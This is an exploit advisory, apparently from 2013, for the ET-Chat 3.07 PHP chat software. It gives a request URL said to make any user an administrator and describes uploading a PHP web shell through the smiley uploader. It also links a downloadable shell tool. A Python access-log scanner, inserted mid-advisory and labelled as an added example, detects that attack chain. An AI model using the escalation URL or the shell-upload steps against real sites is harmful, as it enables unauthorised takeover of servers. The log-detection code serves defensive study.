# Exploit Title: Et-chat 3.07 user id Parameter Remote code execution

# Exploit Author: MR.XpR

# Script Download : http://et-chat.ir/up/et_chat_v307.zip

# Risk : Normal

# Platforms : PHP

# Tested on: 7 , Kali , Vista

# Date : 2013

<------------------------------------------>

-==========<RcE>==========-


# How it works :

This error occurs because cookies are kept.


# Exploit :


/?AdminRegUserEdit&[user or admin]&id=[Parameter]

/?AdminRegUserEdit&admin&id=[Parameter]


# p0c :


Get the user id and put it in place of [Parameter].

For example, my user id is 4

http://site.com/chat/?AdminRegUserEdit&admin&id=4

After that, you are an admin user.



-==========<Uploader>==========-

# For uploading sh3ll go to

/?AdminInsertSmilies <====- Uploader

http://site.com/chat/?AdminInsertSmilies

# Your shell should be smaller than 15 KB

Path to your sh3ll :

http://site.com/smilies/sh3ll.php
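
The requests described in the two sections above leave a recognisable trace in the web server access log. The following Python log scan is an added example, not part of the original advisory or of ET-Chat; it flags AdminRegUserEdit requests, POSTs to AdminInsertSmilies, and script requests under smilies/. The log lines, addresses, function names and the list of script extensions are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Request part of a common/combined format access log line.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Extensions a server may pass to the PHP interpreter (assumed list, adjust to your config).
SCRIPT_RE = re.compile(r'/smilies/[^/?]+\.(php\d?|phtml|phar)$', re.I)
STAGES = {'role-change', 'smiley-upload', 'script-in-smilies'}

def classify(method, target):
    """Return a finding label for one request, or None if it is not of interest."""
    parts = urlsplit(target)
    keys = {p.split('=', 1)[0].lower() for p in parts.query.split('&') if p}
    if 'adminreguseredit' in keys and 'id' in keys:
        return 'role-change'          # the ?AdminRegUserEdit&...&id=N request
    if 'admininsertsmilies' in keys and method == 'POST':
        return 'smiley-upload'        # a file submitted to the smiley uploader
    if SCRIPT_RE.search(parts.path):
        return 'script-in-smilies'    # an image directory should never serve scripts
    return None

def scan(lines):
    """Group findings by client IP; 'chain' is True when all three stages appear."""
    findings = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                  # unparseable line, skip rather than guess
        label = classify(m['method'], m['target'])
        if label:
            findings[m['ip']].append((label, m['status']))
    return {ip: {'hits': hits, 'chain': STAGES <= {h[0] for h in hits}}
            for ip, hits in findings.items()}

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2013:10:00:01 +0000] "GET /chat/?AdminRegUserEdit&admin&id=4 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2013:10:00:09 +0000] "POST /chat/?AdminInsertSmilies HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2013:10:00:15 +0000] "GET /smilies/x.php HTTP/1.1" 200 120',
    '203.0.113.20 - - [01/Jan/2013:10:01:00 +0000] "GET /smilies/smile.gif HTTP/1.1" 200 900',
    '203.0.113.20 - - [01/Jan/2013:10:01:05 +0000] "GET /chat/?AdminInsertSmilies HTTP/1.1" 403 0',
]

if __name__ == '__main__':
    for ip, info in scan(SAMPLE).items():
        print(ip, 'CHAIN' if info['chain'] else 'partial', info['hits'])
```

A chain result is a lead for review rather than proof, since legitimate administrators use both admin endpoints; compare the client against the accounts that are supposed to hold admin rights.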



-=====> IRH mini sheller For Use To this Exploit : <=====-


# Download :

http://uploaderx.persiangig.com/IRH_MINI_Sheller_V1/IRH-Mini-Sheller.zip

# D3mo video :

http://uploaderx.persiangig.com/Et_RCe_Rfu.zip

# for more security :

http://iranhack.org/acc/thread-1082.html


<------------------------------------------>

Greetz : V30Sharp , Moji Rider , Secret.Walker , K3rn3l , Samim.s ,
Farbod Ezrail , @3is , 3nist3in , Siamak.Black

Greetz : r0bb3r68 , M.R.S.CO , Mя.V3nd3tt4 , N4BIL , Ali_Sedaghat ,
MR.XHat , vahid4251 , HACKER OF FLOOD & All Member OF IRH